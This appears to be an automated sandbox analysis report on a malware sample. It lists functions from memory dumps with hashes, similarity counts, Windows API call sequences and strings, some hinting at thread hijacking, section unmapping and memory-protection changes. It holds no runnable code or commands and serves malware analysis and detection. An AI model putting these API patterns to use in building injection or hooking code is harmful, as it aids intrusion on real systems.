  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
